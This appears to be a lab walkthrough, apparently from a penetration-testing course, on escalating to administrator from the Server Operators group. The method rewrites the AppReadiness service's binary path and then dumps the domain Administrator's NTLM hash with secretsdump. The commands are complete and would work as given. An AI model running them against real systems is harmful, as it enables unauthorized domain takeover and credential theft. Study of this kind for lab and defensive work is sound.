
Server Operators

The Server Operators group has SERVICE_ALL_ACCESS over the AppReadiness service (and many other services), so its members can reconfigure and start it.

Query the AppReadiness service (it runs as LocalSystem, so whatever binary it is pointed at executes as SYSTEM)

sc qc AppReadiness

Check the service's permissions with PsService (Sysinternals) and confirm that the Server Operators entry has SERVICE_ALL_ACCESS

PsService.exe security AppReadiness

Check the current members of the local Administrators group, so the change can be compared afterwards

net localgroup administrators

Modify the service binary path

This points the service at a command that adds our current user (server_adm) to the local Administrators group. The space after binPath= is required by sc.exe. The command only runs once the service is started (see step 5 of the approach summary below); the start itself reports an error because cmd.exe is not a real service binary, but by then the command has already executed as SYSTEM.

sc config AppReadiness binPath= "cmd /c net localgroup Administrators server_adm /add"

Confirm that server_adm now appears in the local Administrators group

net localgroup administrators

Confirm local admin access on the domain controller. The new group membership is only reflected in a new logon session, so we test from the attack host rather than from the existing shell (nxc is NetExec, the successor of CrackMapExec)

nxc smb 10.129.43.9 -u server_adm -p 'HTB_@cademy_stdnt!'

Retrieve the Administrator account's NTLM hash from the domain controller (secretsdump uses DCSync-style replication against a DC; -just-dc-user limits the dump to a single account)

impacket-secretsdump server_adm@10.129.43.9 -just-dc-user administrator

Key Concepts:

  • Service Permissions: The Server Operators group has SERVICE_ALL_ACCESS to many services, which allows its members to modify service configurations.

  • Service Modification: The AppReadiness service is used as an example. Its binary path is modified to execute an arbitrary command.

  • Privilege Escalation: The modified service command adds the attacker's user to the local Administrators group, which results in full control over the machine (on a domain controller, the built-in Administrators group is domain-wide).

Approach, Commands, Tools, and Techniques:

  1. Service Query: sc qc AppReadiness (verify service details, including the account it runs as).

  2. Service Permissions Check: PsService.exe security AppReadiness (verify the Server Operators permissions).

  3. Local Administrators Check: net localgroup Administrators (record the current group members).

  4. Service Configuration Modification: sc config AppReadiness binPath= "cmd /c net localgroup Administrators server_adm /add" (modify the service binary path; the space after binPath= is required).

  5. Service Start (Trigger): sc start AppReadiness (start the service, triggering the command; the start reports error 1053 because cmd.exe never registers as a service, but the command has already run).

  6. Local Administrators Verification: net localgroup Administrators (verify successful group addition).

  7. Post-Exploitation: crackmapexec smb <target_ip> -u <user> -p <password> or the equivalent nxc smb command (verify administrative access from a fresh logon session). secretsdump.py <user>@<target_ip> -just-dc-user administrator (extract the Administrator NTLM hash from NTDS.dit).

Commands:

  • sc qc

  • sc config

  • sc start

  • net localgroup Administrators

  • crackmapexec smb / nxc smb

  • secretsdump.py / impacket-secretsdump

Tools:

  • sc.exe (Windows built-in)

  • PsService.exe (Sysinternals)

  • crackmapexec / nxc (CrackMapExec and its successor NetExec; both are built on top of Impacket but are separate projects)

  • secretsdump.py (Impacket)

Techniques:

  • Abusing service permissions.

  • Modifying service configurations.

  • Adding users to the local Administrators group.

  • Post-exploitation using Impacket.

Key Considerations:

  • Service availability: the targeted service must exist and be startable. Restore the original binary path afterwards, or the service stays broken.

  • Permissions: the account must be a member of the Server Operators group (or otherwise hold at least SERVICE_CHANGE_CONFIG and SERVICE_START on the service).

  • Token refresh: group membership changes only apply to new logon sessions, so verify from a new session (for example nxc from the attack host) rather than from the shell that ran sc config.

  • Post exploitation: once admin access is granted, many post-exploitation tasks are available.
